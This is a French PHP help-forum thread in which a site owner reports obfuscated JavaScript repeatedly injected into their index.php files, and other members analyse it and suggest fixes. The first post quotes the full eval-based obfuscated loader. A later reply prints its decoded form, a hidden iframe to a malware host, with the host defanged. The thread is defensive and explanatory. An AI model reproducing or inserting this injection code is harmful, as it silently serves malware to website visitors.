PHPfrance

la communauté d'entraide francophone dédiée au PHP

Sécurite: Problème sur mes Index.php

7 messages   •   Page 1 sur 1
   Outils de sujet
nemrod
Eléphant du PHP | 52 Messages

17 nov. 2008, 06:15

Salitation,

Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison.

J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body>

Code : Tout sélectionner

<script language=JavaScript> function jbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,39,22,1,14,38,60,18,9,0,0,0,0,0,0,58,48,35,28,33,55,56,41,23,6,37,3,45,46,42,24,12,47,17,15,57,54,31,40,20,19,25,0,0,0,0,0,0,4,16,32,52,7,10,11,61,59,8,43,44,51,5,2,34,29,62,36,13,50,27,26,21,53,49);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(208^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}jbnb25('26kQdriGrSfGz8wGBUrhXrkQy10@drilJUvLr8N02fwMs3grEm1MUfwlh3g7rIvQyU5@2Y1LASNWmUM7F8fGcNr00V1ld8vMs6iQr@VMrwiQ0Y@0QV0rqIgGF@QW03NQdpV2z8fMrgwlr8iQhpVr@YMTJHMTTQ0hWV5Ty10rEgS726gLspvisHMFABvLT1gMsU1FcS57B8wN73viuYvMBofQz6N@rrkQyfQil0VMUfwlh3kiE2S') </script>
Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise.

Merci pour votre aide.
ViPHP
ViPHP | 1136 Messages

17 nov. 2008, 09:08

Salut ,

Je pense à plusieurs possibilités pour ces ajout de code :

1: ton code contient une faille qui permet à un pirate de lancer du code qu'il a injecté sur ton serveur , genre faille au niveau d'un upload de fichiers.

2: ton serveur a été piraté , et un genre de "rootkit" tourne dessus , car pour modifier le contenu de fichiers sur un serveur , il te faut la main ( d'une certaine maniére dessus ).

3: Ton poste de développement et aussi peut être vérolé .. et tu uploads tes fichiers vérolés à ton insu sur ton serveur ...

Essaye de voir les dernières modifications de tes fichiers , épluches les log , regardes les process qui tournent sur ton serveur , fais des tests , en créant un nouveau fichier index et surveille le ...

Maintenant , je ne suis pas non plus un expert en sécurité , mais l'ajout de code dans mes fichiers sur mon serveur , m'inquiéterai énormément ...

bon courage ...
cdt,
Stopher.
ViPHP
ViPHP | 5924 Messages

17 nov. 2008, 09:56

Pour information, après décryptage, ce code exécute ceci :

Code : Tout sélectionner

window.status='Done';document.write('')
Le cryptage est soit dit en passant particulièrement inutile dans la mesure où il est très simple quand on a la clé, l'algorithme et la chaine cryptée de trouver la chaine décryptée…
Avatar du membre
Administrateur PHPfrance
Administrateur PHPfrance | 9782 Messages

17 nov. 2008, 09:56

Bonjour,

Voila ce que donne le code javascript que tu as posté une fois décodé:

Code : Tout sélectionner

window.status='Done'; document.write('<iframe name=874e src="http://7addition[ATTENTION_VIRUS].info/t/?' +Math.round(Math.random()*46556)+'874e'+'" width=452 height=103 style="display:none"></iframe>')
Il renvoie effectivement vers une page qui contient un virus dans un fichier PDF, j'ai ajouté le tag "[ATTENTION_VIRUS]" pour éviter qu'un visiteur de PHPfrance copie-colle ce javascript et le teste sans prendre les précaution d'usage. ;)

En clair c'est véritablement un code malfaisant par conséquent, suit les instructions données par stopher et commence par:
1) faire une sauvegarde de tes fichiers importants
2) installe un antivirus/firewall efficace
Quand tout le reste a échoué, lisez le mode d'emploi...
ViPHP
ViPHP | 5924 Messages

17 nov. 2008, 09:58

Merde le document.write m'a tué.

Edit : Après re-test on est d'accord @rthur :)
Eléphant du PHP | 52 Messages

18 nov. 2008, 05:31

Merci stopher, Sékiltoyai et @rthur pour vos reponses.

Pour mon code, Je ne sais pas si il contient une faille mais j'ai verifié sur d'autres sites que j'ai realisé (avec la meme methodologie) et aucun d'eux n'est infectés.

Pour le serveur, je suis avec avec un hebergeur globat.com, et d'apres eux, il n'y a ni spayware ni virus sur le serveur.

Pour mon poste de développement, je l'ai scanné 1000 fois avec McCafé, Kaspersky et l'Anti-Malware ... et rien n'a été trouvé.

Mais ce que j'ai constaté:
C'est un code qui vient apres suppression. Je le retrouve sur mes page 1 à 2 semaines après.
C'est un code qui ne touche que les pages INDEX.PHP.
Je ne pense pas que mes bases de données ont été touché.
Je suis sur que c'est un robot et non un pirate.
Je pense que c'est peut etre une faille dans mes include

Je vais suivre vos conseils, downlaoder tout le site (plus de 3000 pages), vider tout le site, nettoyer les pages une à une, scanner le ficher avec un anti-virus et ré-uploader tout.

:( j'ai perdu 75% de mes visiteurs...
Eléphant du PHP | 217 Messages

18 nov. 2008, 08:26

Bonjour,
je pense que vous devriez modifier vos code d'accès FTP.
En fait ce type de chose ressemble à une attaque avec neosploit.
Plusieurs vagues d’attaques informatiques ont été lancées ces derniers jours à l’encontre de dizaines de milliers de sites Internet, dans le but de les compromettre discrètement et d’infecter ainsi, ensuite, les internautes les visitant. Elles utilisent un code malveillant dénommé "Neosploit".

Lorsqu’un internaute visite un site compromis par Neosploit, ce dernier adapte son attaque à la configuration de l’internaute : il teste ainsi l’ordinateur ciblé, détermine ses vulnérabilités et conduit ensuite l’attaque par le moyen le plus adapté.

En l’état de l’analyse réalisée par le Centre opérationnel de la sécurité des systèmes d’information (COSSI) de la Direction centrale de la sécurité des systèmes d’information (DCSSI), les vulnérabilités exploitées sont toutes connues (vulnérabilités du logiciel Adobe Acrobat, du lecteur QuickTime ainsi que de certains contrôles ActiveX d’Internet Explorer). Une machine mise à jour de ses correctifs de sécurité ne peut donc a priori pas être compromise.

Le COSSI dispose par ailleurs d’une liste de sites français potentiellement compromis. Il s’agit exclusivement de sites de transferts de fichiers (FTP) et non pas de sites Internet (HTTP) utilisés par les internautes pour naviguer. Cependant, dans certains cas, ces sites FTP sont utilisés pour administrer des sites HTTP.

Ces sites FTP sont principalement gérés par des particuliers ou des PME. Les différents opérateurs qui hébergent ces sites Internet potentiellement compromis ont été prévenus.
News tiré de http://www.securite-informatique.gouv.f ... le652.html

Autre informations :
http://securite.reseaux-telecoms.net/ac ... 18867.html
http://www.itrnews.com/articles/82970/n ... etour.html

Et sinon google :D
   Répondre
7 messages   •   Page 1 sur 1
   Outils de sujet